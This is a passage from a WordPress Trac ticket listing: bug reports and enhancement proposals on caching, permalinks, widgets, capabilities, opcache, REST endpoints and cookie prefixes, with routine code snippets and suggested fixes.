additional code whenever the object cache is flushed but currently I can't. Fixing this should be as trivial as adding {{{ do_action('wp_cache_flush'); }}} to the function definition of wp_cache_flush. I don't care about the name of the action or if it runs before or after the flush, I'd just like to have this functionality in the core. Preferably before WordPress 6.0. " k1sul1 Future Releases 50082 Item count is not increasing after adding category Taxonomy 5.5 normal normal Future Release defect (bug) new dev-feedback 2020-05-04T18:13:01Z 2020-08-11T00:46:36Z "I found the number of categories count is not increasing after adding a category for any post types. Please review this issue. Screenshot: https://prntscr.com/saugwy" askaryabbas Future Releases 57909 "It's not logical that the ""Read more""-button disappears when you create a manual excerpt" Formatting 1.5 normal normal Awaiting Review feature request new close 2023-03-12T14:05:20Z 2023-03-14T10:35:34Z "When you create a manual excerpt on a Post, the ""Read more""-button disappears on the Blog-page. That is NOT logical, if you ask me! I was told by the Astra Pro Theme support that this is a default behaviour of WordPress. To me, this is a bug, but formally I guess it's a feature request, to let the user decide whether to have a ""Read more""-button or not, and how it should look! And NOT let it depend on whether you have created a manual excerpt for that post! I will try to add a screen shot which shows that the ""Read more""-button is only visible on Post-thumbnails where I have not manually created the excerpt." hero2 Future Releases 39321 Issue with get_permalink when using wp_update_post() and %author% is part of your permalink Permalinks 4.7 normal normal Awaiting Review defect (bug) new dev-feedback 2016-12-17T21:39:12Z 2020-05-22T04:16:09Z "This was an odd and very specific issue I found with `get_permalink()`. When using `wp_update_post()`, I was getting the following: PHP Notice: Trying to get property of non-object etc... I traced it to `wp-includes/link-template.php` on line 205: {{{#!php if ( strpos($permalink, '%author%') !== false) { $authordata = get_userdata($post->post_author); $author = $authordata->user_nicename; } }}} When the post is a `revision`, post_author is equal to 0, so there's no `user_nicename` property because get_userdata(0) does not return an object. So here's a possible fix for those situations: {{{#!php if ( strpos($permalink, '%author%') !== false) { $authordata = get_userdata($post->post_author); if ( is_a( $authordata, 'WP_User' ) ) { $author = $authordata->user_nicename; } } }}}" mauteri Future Releases 20899 is_home() should be able to be true when is_feed() Query normal normal Future Release defect (bug) reviewing dev-feedback 2012-06-10T19:28:36Z 2017-05-19T15:04:27Z "is_feed() is a special query flag that can be combined with other query flags — for example, `is_author() && is_feed()` for /author/admin/feed/. But it can't be combined with is_home(), because is_home() is the fallback that is only set to true when a lot of other things are true — including is_feed(). This appears to be incorrect — is_home() should still be able to be true despite is_feed(). I tracked this down to [1449]. What kind of breakage could occur with this?" nacin Future Releases 23487 is_blog_installed gives erroneous result on moved database Upgrade/Install 3.0 normal normal defect (bug) new dev-feedback 2013-02-16T13:11:37Z 2021-03-30T14:02:15Z "I resently moved my blogs to a new database, but when I tried it out, on of the blogs wanted a new install. Of course I did not want to do an install and overwrite my blog. I indirectly found the reason in is_blog_installed, which suppresses database errors. Thus I did not see this error. SELECT command denied to user 'techblog'@'localhost' for table 'wp_options' Of course it was my fault, but I virtually had to take the wordpress code apart to find out why my migration failed. Of course this is not a big problem on new installs, but very likely to happen on moving databases. " Kjeld Flarup Future Releases 24283 is_active_widget() incorrect logic Widgets normal normal defect (bug) new dev-feedback 2013-05-08T07:07:41Z 2019-06-05T06:39:17Z "`is_active_widget()` only returns 'true' only if widget used inside sidebar. But there is a provision to use widget directly using `the_widget()` function. I believe there is a need of alter the logic of just checking inside sidebars." valllabh Future Releases 17078 is_active_sidebar() doesn't work with Numeric sidebar ID's Widgets 2.8 normal normal defect (bug) new close 2011-04-07T10:06:54Z 2020-05-20T21:00:56Z "This needs a small fix: Function is_active_sidebar( $index) converts $index to a string then uses wp_get_sidebars_widgets() to see if the sidebar is active ..but keys in the array wp_get_sidebars_widgets() generates can be integers if the ID's of the registered sidebars are integers" lanceo Future Releases 33209 Inviting a new user to Multisite results in password being emailed Users normal normal Future Release enhancement new dev-feedback 2015-07-30T22:16:59Z 2019-06-11T13:07:41Z "If you add a new user from a site users page (NOT the network one, {{{/sitename/wp-admin/user-new.php}}} ) the flow results in a password being emailed in plaintext. 1) Add new user 2) New user gets email to activate 3) Activate link (ex. {{{example.com/sitename/wp-activate.php?key=5324e8cf2cef143b}}} ) shows the new password 4) The following email is sent: {{{ Howdy anotherstenu, Your new account is set up. You can log in with the following information: Username: anotherstenu Password: 78HoBi6oFSf9 http://local.multisite-pre.dev/blarg/wp-login.php Thanks! --The Team @ Multisite Naked Sites }}} Whoops. It looks like this can be fixed for new sites by updating wp-includes/ms-functions.php, however this is set in the database on Network Activation, which means even changing core doesn't update the myriad sites who are merrily emailing out passwords because this is set (wp admin -> Network settings -> Welcome User Email) {{{ Howdy USERNAME, Your new account is set up. You can log in with the following information: Username: USERNAME Password: PASSWORD LOGINLINK Thanks! --The Team @ SITE_NAME }}} The attached patch addresses new setups and doesn't break existing ones since I'm really not sure what's best here. I want to say we should edit everyone's DB and change the above block to this: {{{ Howdy USERNAME, Your new account is set up. Username: USERNAME To set your password, visit the following address: <RESETLINK> Thanks! --The Team @ SITE_NAME }}} However there are myriad people who have customized that simply because they can, and I fear the damage of breaking them." Ipstenu Future Releases 60798 Investigate potentially failing Imagick PDF alpha channel test Media normal normal Awaiting Review defect (bug) new dev-feedback 2024-03-18T11:30:17Z 2024-03-18T11:31:33Z "The test `\Tests_Image_Editor_Imagick::test_remove_pdf_alpha_channel_should_remove_the_alpha_channel_in_preview()` was introduced in #39216 / [56271]. On some hosting providers, this test appears to be failing with errors such as this: {{{ Tests_Image_Editor_Imagick::test_remove_pdf_alpha_channel_should_remove_the_alpha_channel_in_preview The intermediate size could not be retrieved. Failed asserting that false is of type ""array"". /tmp/wp-test-runner/tests/phpunit/tests/image/editorImagick.php:680 }}} Examples: https://make.wordpress.org/hosting/test-results/r57849/wpsabot-r57849/ https://make.wordpress.org/hosting/test-results/r57848/wetopibot-r57848/ We should investigate this failure to see whether it's an issue in core or with the hosting provider. The test mentions ""Ghostscript version >= 9.14"", so maybe it's just a matter of skipping the test if the installed Ghostscript version (`gs --version` I think) is older than that." swissspidy Future Releases 42879 Invent a “Recommended Tools” section Administration normal normal Awaiting Review defect (bug) new dev-feedback 2017-12-12T14:45:58Z 2017-12-13T08:22:52Z "We have recommended plugins and themes, and while most tools are just plugins in disguise, the importers have had the limelight for a bit too long. There are a bunch of handy WordPress tools that deserve some attention, and a dedicated box/page/something under the Tools menu in WP Admin would help bring attention to them." johnjamesjacoby Future Releases 60397 Invalidate opcache after theme / plugin updates seebeen Upgrade/Install 6.4.2 normal normal Awaiting Review defect (bug) assigned dev-feedback 2024-01-31T10:10:01Z 2024-01-31T12:29:13Z "Depending on the server opcache configuration, there is a high possibility of getting an Internal Server Error, or similar after updating a plugin / theme. Specific opchache settings I've verified that trigger the error are: {{{ [opcache] opcache.enable=1 opcache.enable_cli=1 opcache.memory_consumption=256 opcache.interned_strings_buffer=24 opcache.max_accelerated_files=130987 opcache.max_wasted_percentage=2 opcache.use_cwd=1 opcache.validate_timestamps=1 opcache.revalidate_freq=5 opcache.revalidate_path=0 opcache.save_comments=1 opcache.enable_file_override=1 }}} Error happens because validate_timestamps is set to 1 and revalidate_freq is greater than 0. This means that after plugin update, error 500 will stay for up to revalidate_freq seconds due to invalid opcache. This can be mitigated by adding a opcache_invalidate or opcache_reset call upon successful update." seebeen Future Releases 60737 invalid_email or user_email ? Login and Registration trunk normal minor Awaiting Review enhancement new dev-feedback 2024-03-10T21:40:10Z 2024-03-10T21:40:10Z "Hey there, I'm talking about login error keys. Here are the 3 things we can find in the WP Core: {{{#!php <?php $errors->add( 'invalid_email', __( '<strong>Error:</strong> There is no account with that username or email address.' ) ); $errors->add( 'invalid_email', __( '<strong>Error:</strong> The email address is not correct.' ) ); $errors->add( 'user_email', __( '<strong>Error:</strong> The email address is not correct.' ), array('form-field' => 'email', ) ); }}} The 1st is an error message when you try to login using an email address that is not used as a user in this site, the key is ""invalid_email"" The 2nd is an error message when you try to register a new user with an email address that is not correctly formatted, the key is ""invalid_email"" The 3rd is an error message when you try to update your personal profile with an email address that is not correctly formatted, the key is ""user_email"" So we have 2 keys and 2 messages (like ""A1 A2 B2"", should be ""A1 B2 B2"") but the message 2 is sharing both, we should clearly decide is ""invalid_email"" is when the email does not exists in our site OR when the email is not correctly formatted. I suggest that the 2nd message should share the ""user_email"" and let the ""invalid_*"" for the login stuff, like we already have ""invalidcombo"" or ""invalid_username"" that shares the same kind of issue. thanks for your reading time" juliobox Future Releases 22798 "Invalid URLs not giving 404 with ""Default"" permalink settings" Rewrite Rules 3.4 normal normal enhancement new dev-feedback 2012-12-06T23:39:35Z 2019-06-04T21:08:11Z "'''Steps to reproduce:''' - Set up Wordpress with the default .htaccess - Select the ""Default"" option under Permalink Settings - Enter an invalid URL eg 'http://blogroot.com/garlbeflax.abc' '''Expected Behaviour:''' - 404 page is displayed '''Observed Behaviour:''' - No 404 page is ever shown, no matter what the request string is - Instead, Wordpress behaves as if no path was requested, eg displaying the homepage/posts lists. - If requested url has any of the standard params in it, those params ARE executed, eg http://blogroot.com/foo?paged=2 would properly show the 2nd page of the posts. '''Suspected cause:''' In line 620 of wp-includes/class-wp.php (in WP->parse_request), there is a conditional which means the only time the request can be marked as a 404 error is if the array of rewrite rules is NOT empty: {{{ $rewrite = $wp_rewrite->wp_rewrite_rules(); if ( ! empty($rewrite) ) { ... }}} If the ""Default"" permalink is selected, and no other rewrite rules are set up elsewhere (for reasons I didn't investigate, adding a add_rewrite_rule to the theme didn't affect anything), then the $rewrite array IS empty and the request can not be checked to see if it's a 404. Therefore, execution of the request continues as if no path info were submitted. This prevents the showing of the theme's 404 page, and can get a website flagged as spam/exploitative in Google's index. '''Workaround:''' Define a permalink redirect (eg pick one of the options other than Default). Server info: {{{ Apache/2.2.16 (Debian) (w/ mod_rewrite) PHP Version 5.3.3-7+squeeze3 (mod_php5) }}} .htaccess contents: {{{ <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> }}}" vanchuck Future Releases 36507 Invalid URLs in network admin when WP Core is in custom subdirectory Networks and Sites normal normal Awaiting Review defect (bug) reopened dev-feedback 2016-04-13T09:47:36Z 2022-11-16T23:54:54Z "In my setup, I have WordPress Core in a custom subdirectory, so my home URL for a site is like `http://example.com` while my site URL is like `http://example.com/core`. In the network admin area, this results in invalid links since the `network_site_url()` function does not check whether WordPress is installed in a custom subdirectory. The links have a path like `/wp-admin/network/...` although they should have a path like `/core/wp-admin/network/...`." flixos90 Future Releases 48682 Introduce WP_Labels class Taxonomy normal normal Awaiting Review enhancement new dev-feedback 2019-11-17T11:24:49Z 2019-11-17T11:24:49Z "Classes like `WP_Taxonomy` and `WP_Post_Type` return a `stdClass` object for the `$labels` property. The way this is done right now, it should be an array not an object. A solution would be to introduce an abstract `WP_Labels` class that holds all shared the properties (`name`, `singular_name`, `search_items`, etc.) and concrete classes, e.g. `WP_Taxonomy_Labels` for type-specific properties (`choose_from_most_used`, `separate_items_with_commas`, etc). see also #48681." alpipego Future Releases 37692 Introduce WP_Database_Table base class Database normal normal Awaiting Review enhancement new dev-feedback 2016-08-17T13:23:28Z 2017-03-15T17:20:50Z "I've always thought it odd that WordPress only versions blogs, and not each individual database table. On one hand, it's great that the schema changes rarely enough that WordPress core would not get a lot of use out of it. On the other, many plugins would benefit pretty hugely from a smart base class that encapsulated a lot of the procedural work of having custom database tables and maintaining a schema. BuddyPress, for example, comes with several object & metadata pairs, for groups, activity, friends, profiles, messages, notifications, etc... It currently takes WordPress's approach of having a big-dumb installer and a bunch of tangled together upgrade routines. I'd love it if each component could manage it's own schema on the fly, with it's own upgrade routines and database table classes to separate the responsibilities, but without needing to setup `admin_init` hooks and `version_compare()` checks for each component. Django has something similar currently, as do other open-source projects like Piwik, GitLab, Mattermost, etc... ---- I'm imagining that each core database table would extend the `WP_DB_Table` class, each with their own `db_version` and their own methods for upgrading to newer versions. Global tables (like `wp_users`) would use `site_id` `-1` in the `wp_sitemeta` database table to distinguish them as global, and not per-network or per-site. ---- This way, when a plugin like WooCommerce wants to introduce new database tables, they just extend the base class, pass in an array of column-keys & attributes, and the base class would handle the `$wpdb` table registration and all of the other bits and bobs. Eventually... eventually it could get paired up with some kind of a `WP_Base_Query` class to automatically handle cache-key assignments, and generate basic crud methods based on the parameters in the associated `WP_Database_Table` extension. ---- I think this becomes particularly useful in REST applications, where WordPress's APIs can be used and extended for any manner of scalable data storage outside of the core database schemas. Obviously this is a huge idea with lots of moving parts, and without a core need ideas like this are pretty slow on the go. I am already starting to do something similar in my own plugins though - just without the base class - and it feels much easier to maintain each plugin knowing there is a similar convention between them. See: https://code.flox.io/stuttter/wp-site-aliases/blob/master/includes/class-wp-site-aliases-db-table.php" johnjamesjacoby Future Releases 30188 Introduce utility functions to check constants chriscct7 Posts, Post Types normal normal Awaiting Review enhancement assigned dev-feedback 2014-10-29T23:31:14Z 2017-09-22T10:40:31Z "At the moment it's pretty obnoxious to check the various DOING_* constants throughout core and within plugins and elsewhere. The annoyance is compounded whenever we need to verify multiple constants, for example on the save_post hook: {{{#!php function do_some_post_stuff_the_current_way() { // Bail if doing autosave if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) { return; } // Bail if doing AJAX if ( defined( 'DOING_AJAX' ) && DOING_AJAX ) { return; } // Bail if running cron if ( defined( 'DOING_CRON' ) && DOING_CRON ) { return; } // Maybe some other checks... // Do my stuff.. } add_action( 'save_post', 'do_some_post_stuff_the_current_way' ); }}} I initially set out to solve this problem exclusively for saving posts, but became waylaid just in naming such a function (What are we checking exactly? The environment state/context? The mechanism that triggered save_post? etc). I spent the whole day thinking about it and realized the solution reaches beyond just saving post. Enter `wp_check_constants()` and `is_constant_true()`. The former accepts a single or array of constants, the latter only validates one. In these we confirm first that the constant is defined and then that it is explicitly set to `true`. Full stop. I've written a few different tests to support that the function works as advertised. If the general consensus here is that these functions are useful I'd also be happy to submit patches that introduce them throughout core in place of the current `defined( 'FOO' ) && FOO` conditions. Related: #25669 " rzen Future Releases 39156 Introduce singular capabilities for managing individual sites on a network Networks and Sites 3.0 normal normal Future Release enhancement new dev-feedback 2016-12-07T18:50:16Z 2021-07-20T08:00:36Z "As we did in #35614 for taxonomy terms, singular capabilities should be introduced for editing and deleting individual sites on a network. This would allow fine-grained cap checks such as `current_user_can( 'edit_site', $site_id )`. Bear in mind there's a potential clash here with the existing `delete_site` capability which is intended as a cap check for site admins to delete their own site. Needs some thought." johnbillion Future Releases 43210 Introduce singular capabilities for managing individual options Role/Capability normal normal Awaiting Review enhancement new dev-feedback 2018-02-02T00:21:35Z 2018-04-19T21:52:52Z "We've always had `manage_options`, but it's currently impossible whether a user can manage a specific option. As part of related tickets dealing with more granular capabilities (see https://core.trac.wordpress.org/query?status=accepted&status=assigned&status=new&status=reopened&status=reviewing&keywords=~granular-capabilities&col=id&col=summary&col=status&col=owner&col=type&col=priority&col=milestone&col=component&order=priority), I suggest adding a meta capability `manage_option`. It should accept (or basically require) the option name as argument. By default it should fallback to the regular `manage_options`, but an `auth_callback` could be passed to `register_setting()` to tweak the permissions there (such an `auth_callback` is already known from `register_meta()`). This would also be useful for the REST API so that it can use the more granular permissions." flixos90 Future Releases 44617 Introduce new 'hasBlock' behavior for TinyMCE 'BeforeSetContent' and 'SaveContent' events Editor normal normal Future Release defect (bug) new dev-feedback 2018-07-20T13:21:23Z 2018-07-26T02:27:11Z "When TinyMCE editor content has Gutenberg blocks in it, we can assume `<p>` paragraph tags are included too. In this scenario, `wp.editor.autop()` should not be applied to the content. However, even when `wp.editor.autop()` isn't applied, TinyMCE applies `<p>` paragraph tags to all root nodes (e.g. the content of Shortcode Blocks). We can mitigate this behavior by stripping `<p>` paragraph tags from Shortcode Blocks on the 'SaveContent' event. From [https://github.com/WordPress/gutenberg/issues/4672 wordpress/gutenberg#4672]" danielbachhuber Future Releases 24686 Introduce generic filter on transient return value johnbillion Cache API 2.8 normal normal Awaiting Review enhancement reviewing dev-feedback 2013-07-04T16:53:45Z 2021-06-07T09:59:39Z "The `get_transient()` and `get_site_transient()` functions have a filter on their return value, but the filter name contains the transient key: `transient_{$transient}`. This means it's not possible to hook into the return value for ''every'' transient in order to do something like logging transient hits and misses." johnbillion Future Releases 24465 Introduce filter for user password on registration Login and Registration normal normal enhancement new dev-feedback 2013-05-30T17:12:35Z 2020-08-12T14:17:39Z We should introduce a filter within {{{register_new_user}}} on the auto-generated password to make it easier for plugins to handle setting custom passwords. jfarthing84 Future Releases 19100 Introduce esc_color() Formatting normal normal Future Release enhancement new dev-feedback 2011-11-01T12:16:14Z 2020-03-04T06:27:35Z Currently there is no way to escape a color in hexadecimal notation before printing it to a block of css or saving to the database. Many themes like to introduce functionality, whether it be core-supported or completely custom, to change the color of various parts of the templates. I believe that a function such as `esc_color()` would promote best practices while ensuring that unintended values do not get stored as colors and thus echoed in css blocks potentially breaking display. mfields Future Releases 31020 Introduce discrete capability for managing widgets johnbillion Widgets normal normal Future Release enhancement assigned needs-unit-tests 2015-01-15T07:11:15Z 2022-01-30T16:44:08Z "As with management of nav menus (#29213), managing widgets currently requires `edit_theme_options` capability, a capability associated with administrators which grants the power to make many wide sweeping changes. There should be a discrete capability `manage_widgets` just for managing widgets, one that is inherited for anyone who has `edit_theme_options` by default. This was done for Customizer access in #28605 with the introduction of a `customize` capability. Originally brought up in #14386. The same is proposed for menus in #29213." westonruter Future Releases 51365 Introduce dedicated function to check if post meta exists Posts, Post Types normal normal Awaiting Review enhancement new dev-feedback 2020-09-20T21:12:09Z 2020-09-20T23:15:28Z "Just wanted to suggest a simple function that checks for pre-existing metadata for the native `post` post type. Looking forward to getting more involved and collaborating with everyone! {{{#!php <?php /** * Check if post has pre-existing metadata. * * @since 5.5.2 * * @see metadata_exists() * * @param int $post_id The post ID. * @param string $meta_key The meta key to look for. * * @return bool True if key is found. False if not. */ function post_meta_exists( $post_id, $meta_key ) { if ( metadata_exists( 'post', $post_id, $meta_key ) ) { return true; } return false; } }}} " DaveyJake Future Releases 51787 Introduce dedicated function that retrieves post object by metadata Posts, Post Types 5.5.3 normal normal Awaiting Review enhancement new dev-feedback 2020-11-16T13:39:13Z 2020-11-16T13:39:13Z "Just wanted to suggest a function I routinely use when building custom themes that utilize metadata. {{{#!php <?php /** * Get post object from metadata. * * @since 5.5.3 * * @see get_posts() * * @param string $meta_key Meta key. * @param mixed $meta_value Meta value. * @param string $post_type Post type slug. Default 'post'. * * @return WP_Post|bool Post object if successful. False if not. */ function get_post_by_meta( $meta_key = '', $meta_value = '', $post_type = 'post' ) { $args = array( 'post_type' => $post_type, 'meta_key' => $meta_key, 'meta_value' => $meta_value, 'meta_compare' => '=', ); $posts = get_posts( $args ); if ( ! empty( $posts[0] ) ) { return $posts[0]; } return false; } }}} " DaveyJake Future Releases 41332 Introduce dedicated capabilities for managing attachments Media normal normal Future Release enhancement new dev-feedback 2017-07-14T19:01:53Z 2021-02-18T15:56:08Z "The capabilities for attachments currently use the regular post capabilities, so it is impossible to grant users specific attachment capabilities without giving them the same post capabilities. While this is fine for WordPress itself, it can be a pain for custom setups which need specific users to have access to their attachments without them being able to write a post. It is rather easy to change that by setting the `capability_type` argument for the `attachment` post type to `attachment` instead of `post`. To make this change compatible we could do two things: * For new setups, we could simply add the necessary capabilities to the respective roles. Note that this won't work retroactively as it would require a heavy migration none of us wants to invest their time for. :) * For existing setups, the necessary capabilities could be granted to users through a default filter for `'user_has_cap'`, so that it would basically map back to posts. Custom setups could remove that filter to invent their own handling of the attachment capabilities. It might be a bit of a tough idea to have two different ways for this to work, so if we are too wary of doing it, we could of course only do what I described in the second point everywhere. An alternative to the whole thing would be to not change anything but introduce a filter for the attachment post type's `capability_type` argument. Otherwise the value would need to be hacked on the already-registered post object. This solution would clearly lay the responsibility more on the plugin authors, which might make sense given the benefits do not really matter for core itself." flixos90 Future Releases 38690 Introduce classes for settings Options, Meta APIs normal normal Awaiting Review enhancement new dev-feedback 2016-11-07T08:53:14Z 2019-03-26T13:14:34Z "Let's add classes surrounding settings to provide a better structure for dealing with them. It will also allow us to get rid of some globals if we are in a position to remove them (in terms of BC). Here is what I have in mind: * A `WP_Settings` class should be introduced that contains `get()`, `update()`, `add()` and `delete()` methods. This will mostly be copy-paste from the related functions. The functions themselves will become wrappers. * A `WP_Settings_Registry` will be introduced. It should contain all methods that handle registered settings (mostly introduced in 4.7). Again, the functions would become wrappers. We could get rid of the `$wp_registered_settings` global here and store these in a class property instead. * The `WP_Settings_Registry` instance will be contained by the `WP_Settings` instance as a public property. * A function `wp_settings()` will be introduced to access the `WP_Settings` instance or generate it if it does not exist yet. I'm not sure yet how to store the instance: The easy way is a global, but I was wondering where we're at with plans like a `WP::get( 'settings' )` so that we could do it differently. Anyway, let's assume a global first. I think it would be a good pattern to build the class in a flexible way, so that the registry instance and database instance are passed to the class constructor. The following is how I would envision the `wp_settings()` function: {{{ function wp_settings() { global $wp_settings; if ( ! isset( $wp_settings ) ) { $wp_settings = new WP_Settings( new WP_Settings_Registry(), $GLOBALS['wpdb'] ); } return $wp_settings; } }}} I think once we agree on an approach, we should do something similar for metadata. But let's have the discussion in here first and open the other ticket afterwards." flixos90 Future Releases 29213 Introduce capability for access to nav-menus.php johnbillion Menus 3.0 normal normal Future Release enhancement assigned needs-unit-tests 2014-08-14T16:22:16Z 2022-01-30T16:44:01Z "Management of the nav menus currently requires `edit_theme_options` capability, a capability associated with administrators which grants the power to make many wide sweeping changes. There should be a discrete capability `edit_nav_menus` just for managing menus, one that is inherited for anyone who has `edit_theme_options` by default. This was done for Customizer access in #28605 with the introduction of a `customize` capability. Originally brought up in #14386. For introducing a `manage_widgets` capability, see #31020." westonruter Future Releases 54218 Introduce a way to communicate incoming UI updates to users General normal normal Awaiting Review feature request new dev-feedback 2021-10-04T17:28:04Z 2021-11-04T19:43:54Z "We are introducing more and more updates to WordPress. While developers have various channels to get updated on incoming changes, the users find themselves surprised by a new feature. After an update, which now is silent and just happens automatically, a user can find their workflow completely disrupted out of the blue. What if we had a system where we introduced the news of incoming UI updates to users? We would communicate only on thise updates that are definitely going to land in the upcoming release. An idea is adding a dashboard widget, so the message can be coming via some API on wordpress.org website, and link the message to some page where we explain the changes, ways to opt out, how to test today and so on. Of course for strictly controlled environments this could be filtered out and disabled. This is a light approach. There is a more complex route as well, where we try to introduce UI updates in dot versions, silently launching them and inviting users to ""switch"" to the new feature and try it out before it becomes the new default. This is a rather common thing in software as a servuce products, but less seen in distributed as a package OSS software. What do you all think about this?" andraganescu Future Releases 39364 Introduce a trigger to handle a custom queue job and run them Upgrade/Install 4.7 normal normal Awaiting Review enhancement new dev-feedback 2016-12-21T17:03:28Z 2023-03-23T00:11:28Z "While I was creating a plugin which imports theme demos. I have to utilize the `wp.updates` for AJAX way to import and delete the demo packs but unfortunately there are no any trigger which I can utilize to update the queue job for demo by using its action and data in `wp.updates.queueChecker`. As a fix I have introduced a trigger in a patch file :) Any procedure to the extend self-executing anynonmous function `wp.updates.queueChecker` below with only trigger `$document.trigger( 'wp-updates-queue-job', job );` is much appreciated :) {{{ ( function( $, wp ) { var $document = $( document ); wp = wp || {}; /** * The WP Updates object. * * @type {object} */ wp.updates = wp.updates || {}; /** * Sends an Ajax request to the server to delete a demo. * * @param {object} args * @param {string} args.slug Demo Pack. * @param {deleteDemoSuccess=} args.success Optional. Success callback. Default: wp.updates.deleteDemoSuccess * @param {deleteDemoError=} args.error Optional. Error callback. Default: wp.updates.deleteDemoError * @return {$.promise} A jQuery promise that represents the request, * decorated with an abort() method. */ wp.updates.deleteDemo = function( args ) { var $button = $( '.theme-actions .delete-demo' ); args = _.extend( { success: wp.updates.deleteDemoSuccess, error: wp.updates.deleteDemoError }, args ); if ( $button && $button.html() !== wp.updates.l10n.deleting ) { $button .data( 'originaltext', $button.html() ) .text( wp.updates.l10n.deleting ); } wp.a11y.speak( wp.updates.l10n.deleting, 'polite' ); // Remove previous error messages, if any. $( '.theme-info .update-message' ).remove(); $document.trigger( 'wp-demo-deleting', args ); return wp.updates.ajax( 'delete-demo', args ); }; /** * Updates the UI appropriately after a successful demo deletion. * * @typedef {object} deleteDemoSuccess * @param {object} response Response from the server. * @param {string} response.slug Slug of the demo that was deleted. */ wp.updates.deleteDemoSuccess = function( response ) { wp.a11y.speak( wp.updates.l10n.deleted, 'polite' ); $document.trigger( 'wp-demo-delete-success', response ); }; /** * Updates the UI appropriately after a failed demo deletion. * * @typedef {object} deleteDemoError * @param {object} response Response from the server. * @param {string} response.slug Slug of the demo to be deleted. * @param {string} response.errorCode Error code for the error that occurred. * @param {string} response.errorMessage The error that occurred. */ wp.updates.deleteDemoError = function( response ) { var $button = $( '.theme-actions .delete-demo' ), errorMessage = wp.updates.l10n.deleteFailed.replace( '%s', response.errorMessage ), $message = wp.updates.adminNotice( { className: 'update-message notice-error notice-alt', message: errorMessage } ); if ( wp.updates.maybeHandleCredentialError( response, 'delete-demo' ) ) { return; } $( '.theme-info .theme-description' ).before( $message ); $button.html( $button.data( 'originaltext' ) ); wp.a11y.speak( errorMessage, 'assertive' ); $document.trigger( 'wp-demo-delete-error', response ); }; /** * Pulls available jobs from the queue and runs them. */ wp.updates.queueChecker = function() { var job; if ( wp.updates.ajaxLocked || ! wp.updates.queue.length ) { return; } job = wp.updates.queue.shift(); // Handle a queue job. switch ( job.action ) { case 'install-plugin': wp.updates.installPlugin( job.data ); break; case 'update-plugin': wp.updates.updatePlugin( job.data ); break; case 'delete-plugin': wp.updates.deletePlugin( job.data ); break; case 'install-theme': wp.updates.installTheme( job.data ); break; case 'update-theme': wp.updates.updateTheme( job.data ); break; case 'delete-theme': wp.updates.deleteTheme( job.data ); break; default: break; } $document.trigger( 'wp-updates-queue-job', job ); }; })( jQuery, window.wp ); }}} " shivapoudel Future Releases 40365 Introduce a REST API endpoint for sites REST API normal normal Future Release task (blessed) new needs-unit-tests 2017-04-05T00:18:18Z 2020-04-03T05:00:47Z "It should be possible to manage sites in a multisite configuration through the REST API. * List sites: `GET wp/v2/sites/` * Retrieve a site: `GET wp/v2/sites/<id>` * Create a site: `POST wp/v2/sites/` * Update a site: `PUT wp/v2/sites/<id>` * Delete a site: `DELETE wp/v2/sites/<id>` Data included in a site object should at least mirror the data available for the site in `wp_blogs`. Additional ideal pieces of data for a site include `blogname`, `blogdescription`, `home`, and `siteurl`. It's possible that creating a new meta table for sites can help developers register meta for inclusion with a site object (See #37923). Sites should be accessible by default for authenticated users only. Network (global) admins should have access to all sites. Site users should have access to the sites they are members of. The ""My Sites"" list is a great candidate for exploring how this will work. See #15317. As of the introduction of `get_sites()` in 4.6.0, retrieving sites is a much better experience. The methods used to create, update, and delete sites in multisite are not as pleasant right now. We should investigate each of these and determine what can be done to streamline the process. The first improvement is probably in creating a site. See #40364." jeremyfelt Future Releases 36317 Introduce a cookie prefix default constant Login and Registration normal normal enhancement new dev-feedback 2016-03-24T01:41:57Z 2019-06-04T20:23:42Z "Right now, all of WordPress's cookies are prefixed with the same `wordpress` namespace. A problem arises with `advanced-cache.php` caching solutions that load before `wp_cookie_constants()` is called, where the cookie prefix cannot be guessed. The current work around is to stab at each cookie individually: {{{ // Auth cookie if ( defined( 'AUTH_COOKIE' ) && ( $this->cookie === AUTH_COOKIE ) ) { return true; } // User cookie if ( defined( 'USER_COOKIE' ) && ( $this->cookie === USER_COOKIE ) ) { return true; } // Logged-in cookie if ( defined( 'LOGGED_IN_COOKIE' ) && ( $this->cookie === LOGGED_IN_COOKIE ) ) { return true; } }}} And to special case the test cookie, like: {{{ // Generic 'wordpress' cookies (that are not test cookies) if ( ( substr( $this->cookie, 0, 9 ) === 'wordpress' ) && ( $this->cookie !== 'wordpress_test_cookie' ) ) { return true; } }}} But without a known and trusted cookie prefix, it's still an unpredictable environment. ----- I'd like to re-propose an 8 year old issue (#6413) to introduce a new default constant to define a cookie prefix. This could turn the above snippet into something at least slightly more sane, like: {{{ // Generic 'wordpress' cookies (that are not test cookies) if ( defined( 'COOKIEPREFIX' ) ) { $len = strlen( COOKIEPREFIX ); if ( substr( $this->cookie, 0, $len ) === COOKIEPREFIX ) && ( false !== strpos( $this->cookie, 'test_cookie', $len ) ) { return true; } } }}} A `COOKIEPREFIX` constant would also allow plugins an easy way to drop themselves inside of WordPress's cookie namespace, which will help them play more nicely in environments where WordPress is not the only application within the domain." johnjamesjacoby Future Releases 59234 Introduce a `wp_json_decode()` function, including validation when available General 6.4 normal normal Future Release enhancement new dev-feedback 2023-08-28T23:50:14Z 2024-02-12T14:03:01Z "From: https://core.trac.wordpress.org/ticket/59231: > === [https://wiki.php.net/rfc/json_validate New json_validate() function] > > This function is a high-performance way to validate json prior to decoding it. This function cannot be polyfilled without a performance hit. > > However, due to the potential for using json for Denial-of-Service attack vectors (via a HUGE file/stream), I would strongly recommend for WP Core to start using this new function in all appropriate places wrapped within an `if ( function_exists() ) {}`. > > The `json_decode()` function is used 44 times within `src` (excluding external dependencies). > > We may want to consider introducing a `wp_json_decode()` function to ensure the use of `json_validate()` (when available). > This would then mirror the already existing [https://developer.wordpress.org/reference/functions/wp_json_encode/ `wp_json_encode()`] function." jrf Future Releases 38923 Introduce `WP_Action_Handler` to clean up admin action mess Administration normal normal Awaiting Review enhancement new dev-feedback 2016-11-24T01:08:35Z 2020-02-15T10:27:30Z "We all know that several parts of the admin code are messy in a way. After we had to take several looks at these files during today's multisite chat, I thought we need to do something about it. My proposal for now is to introduce a new base class `WP_Action_Handler`. This abstract class would lay a foundation to handle any kind of actions on any admin screen. Currently there's a (sometimes huge) switch clause at the beginning of almost every page. By removing these clauses entirely and handling the logic in a dedicated class for this instead, we get the following benefits: * easier readable code * less huge files * possibility to add unit tests for each of the switch cases * possibility to add unit tests the 